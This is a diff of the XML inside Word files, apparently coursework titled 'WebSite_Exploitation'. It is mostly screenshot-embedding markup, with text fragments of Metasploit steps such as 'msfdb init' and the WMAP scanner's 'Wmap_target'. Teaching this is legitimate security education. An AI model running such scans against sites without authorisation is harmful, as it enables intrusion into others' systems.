-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 22"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="1958302"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="2181552"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="11" name="Picture 25"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 25"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2181552"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="3327355"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="40" name="Picture 40"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 40"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3327355"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="2629719"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="19" name="Picture 19"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 19"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2629719"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="2331918"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="1" name="Picture 1"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 1"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2331918"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>X`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="3650615" cy="1504950"/>
-            <wp:effectExtent l="19050" t="0" r="6985" b="0"/>
-            <wp:docPr id="7" name="Picture 7"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 7"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="3650615" cy="1504950"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="4372834"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="10" name="Picture 10"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 10"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="4372834"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="1838935"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="13" name="Picture 13"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 13"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="1838935"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="4457065" cy="1612900"/>
-            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
-            <wp:docPr id="16" name="Picture 16"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 16"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4457065" cy="1612900"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="2273112"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="25" name="Picture 25"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 25"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2273112"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="4975225" cy="2959100"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="28" name="Picture 28"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 28"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4975225" cy="2959100"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5227320" cy="972185"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="31" name="Picture 31"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 31"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5227320" cy="972185"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="6004800" cy="5375565"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="34" name="Picture 34"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 34"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
-                    <a:srcRect l="-1048" b="717"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="6004800" cy="5375565"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="1703425"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="37" name="Picture 37"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 37"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="1703425"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="1992814"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="12" name="Picture 28"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 28"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="1992814"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+    <w:p/>
+    <w:p>
+      <w:r>
         <w:t>Website scan</w:t>
       </w:r>
     </w:p>
@@ -1290,13 +191,13 @@
     <w:p/>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Step 9</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Wmap_target</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -1443,7 +344,7 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:hyperlink r:id="rId24" w:history="1">
+      <w:hyperlink r:id="rId4" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1476,7 +377,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId5"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -1866,7 +767,7 @@
         <w:t xml:space="preserve">u  </w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
-      <w:hyperlink r:id="rId26" w:history="1">
+      <w:hyperlink r:id="rId6" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>

--- a/BCA_III/WebSite_Exploitation.docx
+++ b/BCA_III/WebSite_Exploitation.docx
@@ -4,7 +4,16 @@
   <w:body>
     <w:p/>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+        </w:rPr>
         <w:t>Website scan</w:t>
       </w:r>
     </w:p>
@@ -16,117 +25,56 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>msfdb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> init</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:proofErr w:type="gramStart"/>
